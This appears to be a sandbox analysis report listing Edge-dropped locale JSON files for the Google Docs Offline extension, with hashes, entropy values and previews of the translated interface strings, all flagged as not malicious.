                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):939
